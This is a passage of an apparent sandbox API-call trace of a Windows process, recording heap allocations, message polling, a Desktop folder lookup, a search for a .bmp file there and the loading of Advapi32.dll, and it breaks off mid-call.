lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0161.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0161.254] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0161.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0161.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0161.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0161.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A4XY 5YOfDJ7NlnC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4XY 5YOfDJ7NlnC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XY 5YOfDJ7NlnC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y 5YOfDJ7NlnC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 5YOfDJ7NlnC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5YOfDJ7NlnC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YOfDJ7NlnC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OfDJ7NlnC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fDJ7NlnC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DJ7NlnC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J7NlnC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7NlnC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NlnC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lnC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.255] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0161.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0161.255] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0161.255] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0161.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0161.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0161.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0161.255] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0161.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0161.256] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0161.256] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0161.256] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0161.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0161.257] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0161.257] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.257] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0161.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.257] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0161.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.257] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.257] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.257] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/A4XY 5YOfDJ7NlnC.bmp", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc73ebf20, ftCreationTime.dwHighDateTime=0x1d4d474, ftLastAccessTime.dwLowDateTime=0xa7aee4b0, ftLastAccessTime.dwHighDateTime=0x1d4cc94, ftLastWriteTime.dwLowDateTime=0xa7aee4b0, ftLastWriteTime.dwHighDateTime=0x1d4cc94, nFileSizeHigh=0x0, nFileSizeLow=0x10c90, dwReserved0=0xb330006, dwReserved1=0xd3b8, cFileName="A4XY 5YOfDJ7NlnC.bmp", cAlternateFileName="A4XY5Y~1.BMP")) returned 0xaa56a0 [0161.259] FindClose (in: hFindFile=0xaa56a0 | out: hFindFile=0xaa56a0) returned 1 [0161.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.259] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0161.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0161.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0161.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.261] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.261] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0161.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0161.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0161.261] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0161.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.262] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0161.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.262] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.262] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0161.262] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0161.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.263] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0161.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.263] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.264] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.264] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0161.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0161.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.265] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0161.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0161.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0161.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0161.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.266] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0161.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 